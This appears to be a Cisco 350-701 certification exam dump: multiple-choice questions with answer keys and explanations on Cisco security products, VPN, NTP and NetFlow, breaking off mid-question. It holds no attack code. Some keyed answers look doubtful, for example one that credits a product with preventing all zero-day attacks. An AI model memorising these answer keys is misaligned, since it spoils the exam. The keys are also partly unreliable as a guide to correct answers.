350-701 Dec-2022

Download as pdf or txt
Download as pdf or txt
You are on page 1of 131

willsonliam55@gmail.

com Skype Apple Kid


willsonliam55@gmail.com Skype Apple Kid

Question 1

Which two protocols must be configured to authenticate end users to the Web Security Appliance? (Choose
two)

A. NTLMSSP
B. Kerberos
C. CHAP
D. TACACS+
E. RADIUS

Answer: A B

Question 2

An engineer is configuring Dropbox integration with Cisco Cloudlock. Which action must be taken before
granting API access in the Dropbox admin console?

A. Authorize Dropbox within the Platform settings in the Cisco Cloudlock portal.
B. Add Dropbox to the Cisco Cloudlock Authentication and API section in the Cisco Cloudlock portal.
C. Send an API request to Cisco Cloudlock from Dropbox admin portal.
D. Add Cisco Cloudlock to the Dropbox admin portal.

Answer: A

Question 3

What is a benefit of using Cisco Umbrella?

A. DNS queries are resolved faster.


B. Attacks can be mitigated before the application connection occurs.
C. Files are scanned for viruses before they are allowed to run.
D. It prevents malicious inbound traffic.

Answer: B

Question 3

Drag and drop the cryptographic algorithms for IPsec from the left onto the cryptographic processes on
the right.

Answer:
willsonliam55@gmail.com Skype Apple Kid

Authentication
+ esp-md5-hmac
+ esp-sha-hmac

Encryption
+ esp-3des
+ esp-aes-256

Explanation

esp-md5-hmac: ESP with MD5 authentication


esp-sha-hmac: ESP with SHA authentication
esp-3des: ESP with 168-bit DES encryption
esp-aes-256: ESP with the 256-bit AES encryption

Question 4

Which security solution is used for posture assessment of the endpoints in a BYOD solution?

A. Cisco FTD
B. Cisco ASA
C. Cisco Umbrella
D. Cisco ISE

Answer: D

Question 5

Which characteristic is unique to a Cisco WSAv as compared to a physical appliance?

A. supports VMware vMotion on VMware ESXi


B. requires an additional license
C. performs transparent redirection
D. supports SSL decryption

Answer: A

Question 6

What are two benefits of using an MDM solution? (Choose two)

A. grants administrators a way to remotely wipe a lost or stolen device


B. provides simple and streamlined login experience for multiple applications and users
C. native integration that helps secure applications across multiple cloud platforms or on-premises
environments
D. encrypts data that is stored on endpoints
E. allows for centralized management of endpoint device applications and configurations

Answer: A E

Question 7

What are two benefits of using Cisco Duo as an MFA solution? (Choose two)

A. grants administrators a way to remotely wipe a lost or stolen device


B. provides simple and streamlined login experience for multiple applications and users
C. native integration that helps secure applications across multiple cloud platforms or on-premises
environments
D. encrypts data that is stored on endpoints
E. allows for centralized management of endpoint device applications and configurations

Answer: B C
willsonliam55@gmail.com Skype Apple Kid

Question 8

What is a benefit of using GET VPN over FlexVPN within a VPN deployment?

A. GET VPN supports Remote Access VPNs


B. GET VPN natively supports MPLS and private IP networks
C. GET VPN uses multiple security associations for connections
D. GET VPN interoperates with non-Cisco devices

Answer: B

Question 9

Which solution allows an administrator to provision, monitor, and secure mobile devices on Windows and
Mac computers from a centralized dashboard?

A. Cisco Umbrella
B. Cisco AMP for Endpoints
C. Cisco ISE
D. Cisco Stealthwatch

Answer: C

Question 10

Which type of data does the Cisco Stealthwatch system collect and analyze from routers, switches, and
firewalls?

A. NTP
B. syslog
C. SNMP
D. NetFlow

Answer: D

Question 11

What is the term for the concept of limiting communication between applications or containers on the
same node?

A. container orchestration
B. software-defined access
C. microservicing
D. microsegmentation

Answer: D

Explanation

Microservices are about dissecting applications to smaller units and run those units independently
instead of running them in a monolithic application. But this question asks about communication between
applications so “microservicing” is not correct.

Micro-segmentation is a network security technique that isolates different workloads from one another
within a data center. A workload can be broadly defined as the resources and processes needed to run an
application. Hosts, virtual machines and containers are a few examples of workloads.

Question 12

What is a characteristic of an EDR solution and not of an EPP solution?

A. stops all ransomware attacks


B. retrospective analysis
willsonliam55@gmail.com Skype Apple Kid

C. decrypts SSL traffic for better visibility


D. performs signature-based detection

Answer: B

Question 13

Drag and drop the security solutions from the left onto the benefits they provide on the right.

Answer:

+ detection, blocking, tracking, analysis, and remediation to protect the enterprise against
targeted and persistent malware attacks: Cisco AMP for Endpoints
+ policy enforcement based on complete visibility of users, mobile devices, client-side
applications, communication between virtual machines, vulnerabilities, threats, and URLs: Full
contextual awareness
+ unmatched security and web reputation intelligence provides real-time threat intelligence
and security protection: Collective Security Intelligence
+ superior threat prevention and mitigation for known and unknown threats: NGIPS

Question 14

Based on the NIST 800-145 guide, which cloud architecture may be owned, managed, and operated by
one or more of the organizations in the community, a third party, or some combination of them, and it
may exist on or off premises?

A. hybrid cloud
B. private cloud
C. public cloud
D. community cloud

Answer: D

Question 15

How does Cisco AMP for Endpoints provide next-generation protection?

A. It encrypts data on user endpoints to protect against ransomware.


B. It leverages an endpoint protection platform and endpoint detection and response.
C. It utilizes Cisco pxGrid, which allows Cisco AMP to pull threat feeds from threat intelligence centers.
D. It integrates with Cisco FTD devices.
willsonliam55@gmail.com Skype Apple Kid

Answer: B

Question 16

A company has 5000 Windows users on its campus. Which two precautions should IT take to prevent
WannaCry ransomware from spreading to all clients? (Choose two)

A. Segment different departments to different IP blocks and enable Dynamic ARP inspection on all VLANs
B. Ensure that noncompliant endpoints are segmented off to contain any potential damage.
C. Ensure that a user cannot enter the network of another department.
D. Perform a posture check to allow only network access to those Windows devices that are already
patched.
E. Put all company users in the trusted segment of NGFW and put all servers to the DMZ segment of the
Cisco NGFW.

Answer: B D

Question 17

What are two characteristics of the RESTful architecture used within Cisco DNA Center? (Choose two)

A. REST uses methods such as GET, PUT, POST, and DELETE.


B. REST codes can be compiled with any programming language.
C. REST is a Linux platform-based architecture.
D. The POST action replaces existing data at the URL path.
E. REST uses HTTP to send a request to a web service.

Answer: A E

Question 18

What is the process In DevSecOps where all changes in the central code repository are merged and
synchronized?

A. CD
B. EP
C. CI
D. QA

Answer: C

Question 19

Which Cisco platform onboards the endpoint and can issue a CA signed certificate while also automatically
configuring endpoint network settings to use the signed endpoint certificate, allowing the endpoint to gain
network access?

A. Cisco ISE
B. Cisco NAC
C. Cisco TACACS+
D. Cisco WSA

Answer: A

Question 20

Which cloud service offering allows customers to access a web application that is being hosted, managed,
and maintained by a cloud service provider?

A. IaC
B. SaaS
willsonliam55@gmail.com Skype Apple Kid

C. IaaS
D. PaaS

Answer: B

Question 21

How does Cisco Workload Optimization portion of the network do EPP solutions solely performance issues?

A. It deploys an AWS Lambda system


B. It automates resource resizing
C. It optimizes a flow path
D. It sets up a workload forensic score

Answer: B

Question 22

Email security has become a high priority task for a security engineer at a large multi- national
organization due to ongoing phishing campaigns. To help control this, the engineer has deployed an
Incoming Content Filter with a URL reputation of (-10.00 to -6.00) on the Cisco ESA. Which action will the
system perform to disable any links in messages that match the filter?

A. Defang
B. Quarantine
C. FilterAction
D. ScreenAction

Answer: A

Question 23

What are two workloaded security models? (Choose two)

A. SaaS
B. IaaS
C. on-premises
D. off-premises
E. PaaS

Answer: C D

Question 24

Which API method and required attribute are used to add a device into DNAC with the native API?

A. lastSyncTime and pid


B. POST and name
C. userSudiSerialNos and deviceInfo
D. GET and serialNumber

Answer: B

Question 25

What provides total management for mobile and PC including managing inventory and device tracking,
remote view, and live troubleshooting using the included native remote desktop support?

A. mobile device management


B. mobile content management
willsonliam55@gmail.com Skype Apple Kid

C. mobile application management


D. mobile access management

Answer: A

Question 26

What is the most common type of data exfiltration that organizations currently experience?

A. HTTPS file upload site


B. Microsoft Windows network shares
C. SQL database injections
D. encrypted SMTP

Answer: A

Question 27

An administrator is configuring NTP on Cisco ASA via ASDM and needs to ensure that rogue NTP servers
cannot insert themselves as the authoritative time source. Which two steps must be taken to accomplish
this task? (Choose two)

A. Specify the NTP version


B. Configure the NTP stratum
C. Set the authentication key
D. Choose the interface for syncing to the NTP server
E. Set the NTP DNS hostname

Answer: C D

Explanation

Step 3 Enter the NTP server IPv4 IP Address.


You cannot enter a hostname for the server; the ASA does not support DNS lookup for the NTP server ->
Answer E is not correct.

Step 5 (Optional) Choose the Interface from the drop-down list.


This setting specifies the outgoing interface for NTP packets. If the interface is blank, then the ASA uses
the default admin context interface according to the management routing table.

Step 6 (Optional) Configure NTP authentication.

Reference: https://www.cisco.com/c/en/us/td/docs/security/asa/asa98/asdm78/general/asdm-78-
general-config/basic-hostname-pw.html

Question 28

Which two criteria must a certificate meet before the WSA uses it to decrypt application traffic? (Choose
two)

A. It must include the current date.


B. It must reside in the trusted store of the WSA.
C. It must reside in the trusted store of the endpoint.
D. It must have been signed by an internal CA.
E. It must contain a SAN.

Answer: A B

Question 29

DoS attacks are categorized as what?


willsonliam55@gmail.com Skype Apple Kid

A. phishing attacks
B. flood attacks
C. virus attacks
D. trojan attacks

Answer: B

Question 30

Which Cisco solution integrates Encrypted Traffic Analytics to perform enhanced visibility, promote
compliance, shorten response times, and provide administrators with the information needed to provide
educated and automated decisions to secure the environment?

A. Cisco SDN
B. Cisco ISE
C. Cisco Security Compliance Solution
D. Cisco DNA Center

Answer: D

Explanation

Recently announced at the June 2017 Cisco Live Event, Encrypted Traffic Analytics will be built into the
Cisco DNA Center (the single window UI for Cisco Apic-Em) and will provide the ability to detect Encrypted
Malware throughout your enterprise network.

Reference: https://www.linkedin.com/pulse/understanding-ciscos-new-anti-malware-tech-eta-austin-
emuang-stubbs

Question 31

Which Cisco security solution stops exfiltration using HTTPS?

A. Cisco CTA
B. Cisco AnyConnect
C. Cisco FTD
D. Cisco ASA

Answer: A

Explanation

Attackers often try to exfiltrate sensitive data, including credentials, using HTTP and HTTPS requests
themselves. Cognitive Threat Analytics uses multiple indications of compromise (IOCs), including global
statistics and local anomaly scores, to reliably distinguish malicious tunneling from benign use of the
technique.

Reference: https://www.cisco.com/c/dam/en/us/products/collateral/security/cognitive-threat-analytics/at-
a-glance-c45-736555.pdf

Question 32

What is a functional difference between Cisco AMP for Endpoints and Cisco Umbrella Roaming Client?

A. The Umbrella Roaming client stops and tracks malicious activity on hosts, and AMP for Endpoints tracks
only URL-based threats.
B. The Umbrella Roaming Client authenticates users and provides segmentation, and AMP for Endpoints
allows only for VPN connectivity
C. AMP for Endpoints authenticates users and provides segmentation, and the Umbrella Roaming Client
allows only for VPN connectivity.
D. AMP for Endpoints stops and tracks malicious activity on hosts, and the Umbrella Roaming Client tracks
only URL-based threats.
willsonliam55@gmail.com Skype Apple Kid

Answer: D

Explanation

Cisco Advanced Malware Protection (AMP) for Endpoints is a malware and virus protection platform that
you can use to protect your environment from intrusion, infected files, and malicious behavior.

Question 33

What is a benefit of flexible NetFlow records?

A. They have customized traffic identification


B. They are used for accounting
C. They monitor a packet from Layer 2 to Layer 5
D. They are used for security

Answer: A

Explanation

Key Advantages to using Flexible NetFlow:


+ Flexibility, scalability of flow data beyond traditional NetFlow
+ The ability to monitor a wider range of packet information producing new information about network
behavior not available today
+ Enhanced network anomaly and security detection
+ User configurable flow information to perform customized traffic identification and the ability to focus
and monitor specific network behavior (-> Therefore answer A is correct)

Reference: https://www.cisco.com/c/en/us/products/collateral/ios-nx-os-software/flexible-
netflow/product_data_sheet0900aecd804b590b.html

Question 34

An engineer recently completed the system setup on a Cisco WSA. Which URL information does the system
send to SensorBase Network servers?

A. Summarized server-name information and MD5-hashed path information


B. none because SensorBase Network Participation is disabled by default
C. URL information collected from clients that connect to the Cisco WSA using Cisco AnyConnect
D. complete URL, without obfuscating the path segments

Answer: D

Explanation

Note: Standard SensorBase Network Participation is enabled by default during system setup -> Answer D
is not correct.

Enabling Participation in The Cisco SensorBase Network

Step 1. Choose Security Services > SensorBase.


Step 2. Verify that Sensor Base Network Participation is enabled. When it is disabled, none of the data that
the appliance collects is sent back to the SensorBase Network servers.
Step 3. In the Participation Level section, choose one of the following levels:
+ Limited. Basic participation summarizes server name information and sends MD5-hashed path
segments to the Sensor Base Network servers.
+ Standard. Enhanced participation sends the entire URL with unobfuscated path segments to the
SensorBase Network servers. This option assists in providing a more robust database, and continually
improves the integrity of Web Reputation Scores.

Reference: https://www.cisco.com/c/en/us/td/docs/security/wsa/wsa11-
5/user_guide/b_WSA_UserGuide_11_5_1/b_WSA_UserGuide_11_5_1_chapter_00.pdf

The “Standard” SensorBase Network Participation is enabled by default during system setup so this
question implies we are using standard level, not Limited level -> Answer D is correct while answer A is
not correct.
willsonliam55@gmail.com Skype Apple Kid

Question 35

What is the purpose of the Cisco Endpoint IoC feature?

A. It is an incident response tool


B. It provides precompromise detection
C. It is a signature-based engine
D. It provides stealth threat prevention

Answer: A

Explanation

The Endpoint Indication of Compromise (IOC) feature is a powerful incident response tool for scanning of
post-compromise indicators across multiple computers.

Reference: https://docs.amp.cisco.com/Cisco%20Endpoint%20IOC%20Attributes.pdf

Question 36

Which Cisco DNA Center RESTful PNP API adds and claims a device into a workflow?

A. api/v1/fie/config
B. api/v1/onboarding/workflow
C. api/v1/onboarding/pnp-device
D. api/v1/onboarding/pnp-device/import

Answer: D

Explanation

The Device Onboarding API supports the PnP process, giving the developer the option to create a workflow
that detects when a device joins the network and communicates with Cisco DNA Center, and then sending
the onboarding configuration to the device.
This API is composed of 28 endpoints, that can be used to manage workflows, include devices in the PnP
Process, claim devices, amongst other things.

PYTHON script:
ONBOARDING_PNP_IMPORT_URL = ‘/dna/intent/api/v1/onboarding/pnp-device/import’

Reference: https://developer.cisco.com/docs/dna-center/#!device-onboarding/onboarding-pnp-api

Question 37

What does endpoint isolation in Cisco AMP for Endpoints security protect from?

A. a malware spreading across the user device


B. an infection spreading across the network
C. an infection spreading across the LDAP or Active Directory domain from a user account
D. a malware spreading across the LDAP or Active Directory domain from a user account

Answer: A

Question 38

An engineer is deploying Cisco Advanced Malware Protection (AMP) for Endpoints and wants to create a
policy that prevents users from executing file named abc424952615.exe without quarantining that file.
What type of Outbreak Control list must the SHA-256 hash value for the file be added to in order to
accomplish this?

A. Advanced Custom Detection


B. Blocked Application
C. Simple Custom Detection
D. Isolation
willsonliam55@gmail.com Skype Apple Kid

Answer: B

Explanation

A Simple Custom Detection list is similar to a blacklist. These are files that you want to detect and
quarantine. Not only will an entry in a Simple Custom Detection list quarantine future files, but through
Retrospective it will quarantine instances of the file on any endpoints in your organization that the service
has already seen it on -> Answer C is not correct.

Application Control – Blocked Applications

A blocked applications list is composed of files that you do not want to allow users to execute but do not
want to quarantine. You may want to use this for files you are not sure are malware, unauthorized
applications, or you may want to use this to stop applications with vulnerabilities from executing until a
patch has been released.

Reference: https://docs.amp.cisco.com/en/SecureEndpoint/Secure%20Endpoint%20User%20Guide.pdf

Question 39

Which feature does the IaaS model provide?

A. granular control of data


B. software-defined network segmentation
C. dedicated, restricted workstations
D. automatic updates and patching of software

Answer: C

Explanation

In the infrastructure-as-a-service (IaaS) model, the subscriber leases just the hardware infrastructure
(networking, data center space, storage, servers, and virtualization services), but establishes and
maintains all other components of the technology stack (applications, data, runtime, middleware,
operating systems, etc.).

Question 40

Which VMware platform does Cisco ACI integrate with to provide enhanced visibility, provide policy
integration and deployment, and implement security policies with access lists?

A. VMware APIC
B. VMware vRealize
C. VMware fusion
D. VMware horizons

Answer: B

Question 41

Which two capabilities does an MDM provide? (Choose two)

A. delivery of network malware reports to an inbox in a schedule


B. unified management of mobile devices, Macs, and PCs from a centralized dashboard
C. enforcement of device security policies from a centralized dashboard
D. manual identification and classification of client devices
E. unified management of Android and Apple devices from a centralized dashboard

Answer: B C

Question 42
willsonliam55@gmail.com Skype Apple Kid

What are two recommended approaches to stop DNS tunneling for data exfiltration and command and
control call backs? (Choose two)

A. Use intrusion prevention system.


B. Block all TXT DNS records.
C. Enforce security over port 53.
D. Use next generation firewalls.
E. Use Cisco Umbrella.

Answer: C E

Question 43

In which two ways does the Cisco Advanced Phishing Protection solution protect users? (Choose two)

A. It prevents use of compromised accounts and social engineering.


B. It prevents all zero-day attacks coming from the Internet.
C. It automatically removes malicious emails from users’ inbox.
D. It prevents trojan horse malware using sensors.
E. It secures all passwords that are shared in video conferences.

Answer: B C

Question 44

Which capability is provided by application visibility and control?

A. reputation filtering
B. data obfuscation
C. data encryption
D. deep packet inspection

Answer: D

Question 45

An organization is implementing AAA for their users. They need to ensure that authorization is verified for
every command that is being entered by the network administrator. Which protocol must be configured in
order to provide this capability?

A. EAPOL
B. SSH
C. RADIUS
D. TACACS+

Answer: D

Question 46

Drag and drop the deployment models from the left onto the explanations on the right.
willsonliam55@gmail.com Skype Apple Kid

Answer:

+ A GRE tunnel is utilized in this solution: passive with ERSPAN


+ Attacks are not prevented with this solution: passive
+ This solution allows inspection between hosts on the same subnet: transparent
+ This solution does not provide filtering between hosts on the same subnet: routed

Explanation

Monitoring (passive) mode is the mode where the Cisco NGFW or NGIPS device does not usually prevent
attacks. The device uses one interface to silently inspect traffic and identify malicious activity without
interrupting traffic flow.

Passive with ERSPAN Mode: You can configure one physical interface operating as a sniffer – very
similar to a traditional remote intrusion detection system (IDS). A Generic Routing Encapsulation (GRE)
tunnel between the capture point and the Cisco FTD carries the packets to be inspected.

Reference: CCNP and CCIE Security Core SCOR 350-701 Official Cert Guide

Question 47

When network telemetry is implemented, what is important to be enabled across all network infrastructure
devices to correlate different sources?

A. CDP
B. NTP
C. syslog
D. DNS

Answer: B

Question 48

What is the difference between EPP and EDR?

A. EPP focuses primarily on threats that have evaded front-line defenses that entered the environment.
B. Having an EPP solution allows an engineer to detect, investigate, and remediate modern threats.
C. EDR focuses solely on prevention at the perimeter.
D. Having an EDR solution gives an engineer the capability to flag offending files at the first sign of
malicious behavior.

Answer: D

Explanation

EPP (Endpoint Protection Platform) covers traditional anti-malware scanning, whereas EDR (Endpoint
Detection and Response) covers some more advanced capabilities like detecting and investigating security
incidents, and ability to remediate endpoints to pre-infection state.

Refefence: https://www.sans.org/webcasts/epp-edr-both-choose-generation-endpoint-security-109470/
willsonliam55@gmail.com Skype Apple Kid

EDR focuses primarily on threats that have evaded front-line defenses and entered into your environment.
An endpoint protection platform, however, focuses solely on prevention -> Answer A and answer C are not
correct.

An EPP can often be described as a traditional anti-virus solution. While deploying an anti-virus solution
will improve your front-line security, it does not protect your endpoints from more sophisticated threats
that may find a way into your network. Endpoint security solutions should have endpoint protection
platform capabilities, but they must also have the capabilities of an endpoint detection and response
solution -> Answer B is not correct.

Reference: https://www.cisco.com/c/en/us/products/security/what-is-endpoint-protection-platform.html

Question 49

An engineer is adding a Cisco router to an existing environment. NTP authentication is configured on all
devices in the environment with the command ntp authentication-key 1 md5 Clsc427128380. There
are two routers on the network that are configured as NTP servers for redundancy, 192.168.1.110 and
192.168.1.111. 192.168.1.110 is configured as the authoritative time source. What command must be
configured on the new router to use 192.168.1.110 as its primary time source without the new router
attempting to offer time to existing devices?

A. ntp server 192.168.1.110 key 1 prefer


B. ntp peer 192.168.1.110 prefer key 1
C. ntp server 192.168.1.110 primary key 1
D. ntp peer 192.168.1.110 key 1 primary

Answer: A

Explanation

A router can be configured to prefer an NTP source over another. A preferred server’s responses are
discarded only if they vary dramatically from the other time sources. Otherwise, the preferred server is
used for synchronization without consideration of the other time sources. Preferred servers are usually
specified when they are known to be extremely accurate. To specify a preferred server, use
the prefer keyword appended to the ntp server command.

Question 50

Which algorithm is an NGE hash function?

A. HMAC
B. SHA-1
C. MD5
D. SHA-2

Answer: D

===================================== New Questions (added on 19th-Oct-


2022) =====================================

Question 51

A university policy must allow open access to resources on the Internet for research, but internal
workstations are exposed to malware. Which Cisco AMP feature allows the engineering team to determine
whether a file is installed on a selected few workstations?

A. file prevalence
B. file discovery
C. file conviction
D. file manager

Answer: A

Explanation
willsonliam55@gmail.com Skype Apple Kid

Prevalence: AMP displays all files that are running across your organization, ordered by prevalence (from
lowest to highest number of instances), to help you surface previously undetected threats seen by a small
number of users. Files opened by only a few users may be malicious.

Reference: https://cstor.com/wp-content/uploads/2016/10/Cisco_Advanced-Malware-Protection-for-
Endpoints_Data-Sheet.pdf

Question 52

During a recent security audit, a Cisco IOS router with a working IPSEC configuration using IKEv1 was
flagged for using a wildcard mask with the crypto isakmp key command. The VPN peer is a SOHO router
with a dynamically assigned IP address. Dynamic DNS has been configured on the SOHO router to map
the dynamic IP address to the host name of vpn.sohoroutercompany.com. In addition to the
command crypto isakmp key Cisc123456789 hostname vpn.sohoroutercompany.com, what other
two commands are now required on the Cisco IOS router for the VPN to continue to function after the
wildcard command is removed? (Choose two)

A. ip host vpn.sohoroutercompany.com <VPN Peer IP Address>


B. crypto isakmp identity hostname
C. Add the dynamic keyword to the existing crypto map command
willsonliam55@gmail.com Skype Apple Kid

D. fqdn vpn.sohoroutercompany.com <VPN Peer IP Address>


E. ip name-server <DNS Server IP Address>

Answer: A B

Explanation

The command “crypto isakmp identity hostname” configures the identity of the ISAKMP peer to the host
name concatenated with the domain name (fully qualified domain name for example,
myhost.domain.com).

If you use the host name identity method, you may need to specify the host name for the remote peer if a
DNS server is not available for name resolution. An example of this follows:
RouterA(config)# ip host RouterB.domain.com 172.30.2.2

Reference: https://www.ccexpert.us/bcran/step-3configure-isakmp-identity.html

Question 53

Which command is used to log all events to a destination collector 209.165.201.10?

A. CiscoASA(config-pmap-c)# flow-export event-type all destination 209.165.201.10


B. CiscoASA(config-cmap)# flow-export event-type flow-update destination 209.165.201.10
C. CiscoASA(config-pmap-c)# flow-export event-type flow-update destination 209.165.201.10
D. CiscoASA(config-cmap)# flow-export event-type all destination 209.165.201.10

Answer: A

Explanation

This example shows how to configure NetFlow for ASA:

ASA(config)# access-list netflow-export extended permit ip any any


ASA(config)# flow-export destination inside 172.16.1.100 9996
ASA(config)# flow-export template timeout-rate 1
ASA(config)# flow-export delay flow-create 60
ASA(config)# class-map netflow-export-class
ASA(config-cmap)#match access-list netflow-export
ASA(config)#policy-map global_policy
ASA(config-pmap)# class netflow-export-class
ASA(config-pmap-c)# flow-export event-type all destination 172.16.1.100 //export all event log types to
172.16.1.100

============================= New Questions (added on 24th-Nov-2022)


=============================

Question 54

A company identified a phishing vulnerability during a pentest. What are two ways the company can
protect employees from the attack? (Choose two)

A. using Cisco ISE


B. using Cisco FTD
C. using an inline IPS/IDS in the network
D. using Cisco ESA
E. using Cisco Umbrella

Answer: D E

Explanation

The following are the benefits of deploying Cisco Advanced Phishing Protection on the Cisco Email
Security Gateway (ESA):
willsonliam55@gmail.com Skype Apple Kid

Prevents the following:


+ Attacks that use compromised accounts and social engineering.
+ Phishing, ransomware, zero-day attacks and spoofing.
+ BEC with no malicious payload or URL.

Reference: https://www.cisco.com/c/en/us/td/docs/security/esa/esa13-
5/user_guide/b_ESA_Admin_Guide_13-5/m_advanced_phishing_protection.html

Cisco Umbrella protects users from accessing malicious domains by proactively analyzing and blocking
unsafe destinations – before a connection is ever made. Thus it can protect from phishing attacks by
blocking suspicious domains when users click on the given links that an attacker sent.

Question 55

Which feature is used in a push model to allow for session identification, host reauthentication, and session
termination?

A. CoA request
B. AAA attributes
C. carrier-grade NAT
D. AV pair

Answer: A

Explanation

The Cisco software supports the RADIUS CoA request defined in RFC 5176 that is used in a pushed model,
in which the request originates from the external server to the device attached to the network, and
enables the dynamic reconfiguring of sessions from external authentication, authorization, and accounting
(AAA) or policy servers.

Use the following per-session CoA requests:

– Session reauthentication
– Session termination
– Session termination with port shutdown
– Session termination with port bounce
– Security and Password Accounting

Question 56

What are the components of endpoint protection against social engineering attacks?

A. firewall
B. IDS
C. IPsec
D. ESA

Answer: D

Question 57

A company recently discovered an attack propagating throughout their Windows network via a file named
abc4350G8l99xyz.exe. The malicious file was uploaded to a Simple Custom Detection list in the AMP for
Endpoints Portal and the currently applied policy for the Windows clients was updated to reference the
detection list. Verification testing scans on known infected systems shows that AMP for Endpoints is not
detecting the presence of this file as an indicator of compromise. What must be performed to ensure
detection of the malicious file?

A. Upload the malicious file to the Blocked Application Control List


B. Use an Advanced Custom Detection list instead of a Simple Custom Detection List
C. Check the box in the policy configuration to send the file to Cisco Threat Grid for dynamic analysis
D. Upload the SHA-256 hash for the file to the Simple Custom Detection List
willsonliam55@gmail.com Skype Apple Kid

Answer: D

Explanation

We can upload the SHA-256 hash of this file to the Simple Customer Detection List so that AMP for
Endpoints can block it.

Reference: https://www.cisco.com/c/en/us/support/docs/security/amp-endpoints/215176-configure-a-
simple-custom-detection-list.pdf
willsonliam55@gmail.com Skype Apple Kid

Question 1

Which function is performed by certificate authorities but is a limitation of registration authorities?

A. CRL publishing
B. verifying user identity
C. certificate re-enrollment
D. accepts enrollment requests

Answer: A

Explanation

A Registration Authority (RA) is an authority in a network that verifies user requests for a digital certificate
and tells the Certificate Authority (CA) to issue it. RAs are part of a public key infrastructure (PKI), a
networked system that enables companies and users to exchange information and money safely and
securely.

Certificate revocation list (CRL): This is a list of certificates, based on their serial numbers, that had
initially been issued by a CA but have since been revoked and as a result should not be trusted.

Question 2

Which encryption algorithm provides highly secure VPN communications?

A. DES
B. 3DES
C. AES 256
D. AES 128

Answer: C

Question 3

A hacker initiated a social engineering attack and stole username and passwords of some users within a
company. Which product should be used as a solution to this problem?

A. Cisco NGFW
B. Cisco AMP for Endpoints
C. Cisco Duo
D. Cisco AnyConnect

Answer: C

Question 4

How does a WCCP-configured router identify if the Cisco WSA is functional?

A. If an ICMP ping fails three consecutive times between a router and the WSA, traffic is no longer
transmitted to the router.
B. If an ICMP ping fails three consecutive times between a router and the WSA, traffic is no longer
transmitted to the WSA.
C. The router sends a Here-I-Am message every 10 seconds, and the WSA acknowledges with an I-See-
You message.
D. The WSA sends a Here-I-Am message every 10 seconds, and the router acknowledges with an I-See-
You message.

Answer: D

Explanation

If WCCP proxy health checking is enabled, the WSA’s WCCP daemon sends a proxy health check message
(xmlrpc client request) to the xmlrpc server running on the Web proxy every 10 seconds. If the proxy is
willsonliam55@gmail.com Skype Apple Kid

up and running, the WCCP service receives a response from the proxy and the WSA sends a WCCP “here I
am” (HIA) message to the specified WCCP-enabled routers every 10 seconds. If the WCCP service doesn’t
receive a reply from the proxy, then HIA messages are not sent to the WCCP routers.

After a WCCP router misses three consecutive HIA messages, the router removes the WSA from its service
group and traffic is no longer forwarded to the WSA.

Reference: https://www.cisco.com/c/en/us/td/docs/security/wsa/wsa11-
0/user_guide/b_WSA_UserGuide/b_WSA_UserGuide_chapter_0111.html

Question 5

What is a feature of NetFlow Secure Event Logging?

A. It exports only records that indicate significant events in a flow.


B. It supports v5 and v8 templates.
C. It filters NSEL events based on the traffic and event type through RSVP.
D. It delivers data records to NSEL collectors through NetFlow over TCP only.

Answer: A

Explanation

The ASA and ASASM implementations of NSEL provide a stateful, IP flow tracking method that exports
only those records that indicate significant events in a flow -> Answer A is correct.

The ASA and ASASM implementations of NSEL provide the following major functions:

+ Tracks configured NSEL collectors and delivers templates and data records to these configured NSEL
collectors through NetFlow over UDP only -> Answer D is not correct.
+ Filters NSEL events based on the traffic and event type through Modular Policy Framework, then sends
records to different collectors -> Answer C is not correct.

Reference: https://www.cisco.com/c/en/us/td/docs/security/asa/asa91/asdm71/general/asdm_71_general
_config/monitor_nsel.pdf

Only NSEL version 9 supports templates -> Answer B is not correct.

Question 6

An administrator needs to configure the Cisco ASA via ASDM such that the network management system
can actively monitor the host using SNMPv3. Which two tasks must be performed for this configuration?
(Choose two)

A. Specify the SNMP manager and UDP port.


B. Specify a community string.
C. Add an SNMP USM entry.
D. Add an SNMP host access entry.
E. Specify an SNMP user group.

Answer: A D

Explanation
willsonliam55@gmail.com Skype Apple Kid

This is how to configure SNMP on your Cisco ASA using ASDM:


The first order of business is to navigate to the screen shown below:

Next, click on the Add button above and the window below appears:

Question 7

Which technology enables integration between Cisco ISE and other platforms to gather and share network
and vulnerability data and SIEM and location information?

A. pxGrid
B. SNMP
C. NetFlow
D. Cisco Talos
willsonliam55@gmail.com Skype Apple Kid

Answer: A

Explanation

Cisco ISE uses Cisco Platform Exchange Grid (pxGrid) technology to share contextual data with leading
SIEM and TD partner solutions.

Reference: https://www.cisco.com/c/en/us/products/collateral/security/identity-services-engine/at-a-
glance-c45-732858.html

Question 8

A large organization wants to deploy a security appliance in the public cloud to form a site-to-site VPN and
link the public cloud environment to the private cloud in the headquarters data center. Which Cisco
security appliance meets these requirements?

A. Cisco Cloud Orchestrator


B. Cisco Stealthwatch Cloud
C. Cisco ASAv
D. Cisco WSAv

Answer: C

Question 9

What is a benefit of using Cisco Tetration?

A. It collects policy compliance data and process details.


B. It collects telemetry data from servers and then uses software sensors to analyze flow information.
C. It collects near-real time data from servers and inventories the software packages that exist on servers
D. It collects enforcement data from servers and collects interpacket variation.

Answer: C

Explanation

Cisco Secure Workload (formerly Tetration) collects packet header metadata, process details and installed
software package information. This is collected via the software sensors deployed on the workloads and
made available as part of the solution. More detailed information is available in the Cisco Secure Workload
product documentation. Below are the high-level details regarding the telemetry data that is collected by
Cisco Secure Workload:
+ Flow information: Contains details about flow endpoints, protocols, and ports, when the flow started,
how long the flow was active, etc.
+ Inter-packet variation: Captures any inter-packet variations seen within the flow, including variations in
the packetʼs Time to Live (TTL), IP/TCP flags, packet length, etc.
+ Process details: Captures processes executed on the server, including information about process
parameters, start and stop time, process binary hash, etc.
+ Software packages: Inventory of all software packages installed on the server along with the version
and publisher information
+ Cisco Secure Workload forensics capability: If a customer turns on the Cisco Secure Workload forensics
capability, additional Personally Identifiable Information may be collected.

Reference: https://trustportal.cisco.com/c/dam/r/ctp/docs/privacydatasheet/security/cisco-tetration-
privacy-data-sheet.pdf

Question 10

Which standard is used to automate exchanging cyber threat information?

A. IoC
B. TAXII
C. MITRE
D. STIX
willsonliam55@gmail.com Skype Apple Kid

Answer: B

Explanation

Structured Threat Information Expression (STIX) and Trusted Automated Exchange of Intelligence
Information (TAXII) are standards developed in an effort to improve the prevention and mitigation of
cyber-attacks. STIX states the “what” of threat intelligence, while TAXII defines “how” that information is
relayed. Unlike previous methods of sharing, STIX and TAXII are machine-readable and therefore easily
automated.

TAXII should be the best answer here because it is Trusted Automated Exchange of Intelligence
Information.

Question 11

Which security solution uses NetFlow to provide visibility across the network, data center, branch offices,
and cloud?

A. Cisco Encrypted Traffic Analytics


B. Cisco CTA
C. Cisco Umbrella
